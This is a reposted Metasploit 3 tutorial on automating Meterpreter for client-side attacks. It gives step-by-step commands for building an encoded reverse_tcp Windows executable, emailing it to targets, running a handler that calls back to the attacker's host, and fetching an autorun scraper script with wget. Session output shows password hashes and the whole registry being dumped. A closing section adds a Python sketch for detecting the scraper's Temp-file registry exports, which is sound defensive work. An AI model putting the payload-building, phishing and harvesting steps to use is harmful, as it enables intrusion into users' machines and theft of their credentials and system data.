且构网 - Sharing the stories of programmers and software development

Metasploit 3 - Automating Meterpreter for Client-Side Exploits

Updated: 2022-09-14 12:54:08

Step 1. Determine your payload delivery. In this case, we will be manually sending an email message to each target, with an executable attached. The actual "exploit"
is social engineering, but this can be replaced by any other type of remote code execution vector. To generate an executable for the test, we use msfpayload piped to msfencode.

$ msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | \
  msfencode -b _ -t exe -o meterpreter.exe
$ file meterpreter.exe
meterpreter.exe: MS-DOS executable PE  for MS Windows (GUI) Intel 80386 32-bit
$ ls -alrt meterpreter.exe
-rw-r--r-- 1 hdm hdm 9728 Nov 17 13:24 meterpreter.exe

Step 2. Configure a shellcode handler inside Metasploit 3. Since we are targeting a wide
variety of users, we want them to connect back to us. To gather as much information
as possible from each host, we will be using the Meterpreter payload.

msf > use exploit/multi/handler
msf exploit(handler) > set ExitOnSession false
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST A.B.C.D
msf exploit(handler) > set LPORT 8080

Step 3. In order to make efficient use of each session, we are going to provide
Meterpreter with an "autorun" script. This script will scrape system information
from each session automatically when the session is created. One example of this
kind of script can be found at:

http://metasploit.com/users/hdm/tools/scraper.rb

msf exploit(handler) > sh -c 'cd /tmp; wget http://metasploit.com/users/hdm/tools/scraper.rb'
msf exploit(handler) > set AutoRunScript /tmp/scraper.rb
msf exploit(handler) > exploit -j

Step 4. Send out our email or otherwise force the Meterpreter payload to execute
on each target. At this point, results should start streaming in. Once the autorun script
completes, the session will be available from the msfconsole. The captured data will be
stored in the ~/.msf3/logs/scraper/ directory.

[*] Transmitting intermediate stager for over-sized stage...(191 bytes)
[*] Sending stage (2650 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (75787 bytes)...
[*] Upload completed.
[*] New session on 10.10.11.164:12188...
[*] Gathering basic system information...
[*] Dumping password hashes...
[*] Obtaining the entire registry...
[*]  Exporting HKCU
[*]  Downloading HKCU (C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg)
[*]  Cleaning HKCU
[*]  Exporting HKLM
[*]  Downloading HKLM (C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg)
[*]  Cleaning HKLM
[*]  Exporting HKCC
[*]  Downloading HKCC (C:/DOCUME~1/HD/LOCALS~1/Temp/mhJZFMly.reg)
[*]  Cleaning HKCC
[*]  Exporting HKCR
[*]  Downloading HKCR (C:/DOCUME~1/HD/LOCALS~1/Temp/CphWxqAm.reg)
[*]  Cleaning HKCR
[*]  Exporting HKU
[*]  Downloading HKU (C:/DOCUME~1/HD/LOCALS~1/Temp/aHrkdFru.reg)
[*]  Cleaning HKU
[*] Completed processing on 10.10.11.164:12188...

[*] Meterpreter session 1 opened (10.10.10.26:8080 -> 10.10.11.164:12188)

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: HDM-WIN/HD
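From the defender's side, the scraper output above leaves a recognizable host artifact: a randomly named eight-letter .reg file written to the user's Temp directory for each hive and removed moments later. The following detection sketch is an added example, not code from the original post or from Metasploit; the file-event lines it consumes are constructed, and the "create/delete within a short window" heuristic is an assumption about how such telemetry would be fed in.

```python
# Added example (not part of the original post): flag the registry-dump
# pattern visible in the scraper output above, i.e. a randomly named .reg
# file created in a user's Temp directory and deleted shortly afterwards.
import re
from datetime import datetime, timedelta

# Constructed sample file events in "ISO-time action path" form (not real telemetry).
EVENTS = """\
2022-09-14T12:50:01 create C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg
2022-09-14T12:50:04 delete C:/DOCUME~1/HD/LOCALS~1/Temp/NIgfrwlC.reg
2022-09-14T12:50:05 create C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg
2022-09-14T12:50:09 delete C:/DOCUME~1/HD/LOCALS~1/Temp/dClzheFr.reg
2022-09-14T12:51:00 create C:/Users/HD/Desktop/backup-settings.reg
2022-09-14T12:53:30 create C:/DOCUME~1/HD/LOCALS~1/Temp/tmp1.txt
2022-09-14T12:53:31 delete C:/DOCUME~1/HD/LOCALS~1/Temp/tmp1.txt
"""

# Eight random letters plus ".reg" directly inside a Temp directory, as in the
# Downloading lines of the scraper output above.
TEMP_REG = re.compile(r"/Temp/[A-Za-z]{8}\.reg$")


def parse(events_text):
    """Yield (timestamp, action, path) tuples from the constructed event format."""
    for line in events_text.splitlines():
        ts, action, path = line.split(" ", 2)
        yield datetime.fromisoformat(ts), action, path


def find_registry_dumps(events_text, window=timedelta(seconds=30)):
    """Return paths of Temp .reg files that were created and deleted within `window`.

    A legitimate .reg export normally survives on disk; a short-lived one in
    Temp matches the export-download-clean cycle the scraper performs per hive.
    """
    created = {}
    hits = []
    for ts, action, path in parse(events_text):
        if not TEMP_REG.search(path):
            continue
        if action == "create":
            created[path] = ts
        elif action == "delete" and path in created:
            if ts - created.pop(path) <= window:
                hits.append(path)
    return hits


if __name__ == "__main__":
    for p in find_registry_dumps(EVENTS):
        print("suspicious short-lived registry export:", p)
```

Several hits from one host within a minute, one per hive, is the signature of a whole-registry scrape rather than a single manual export.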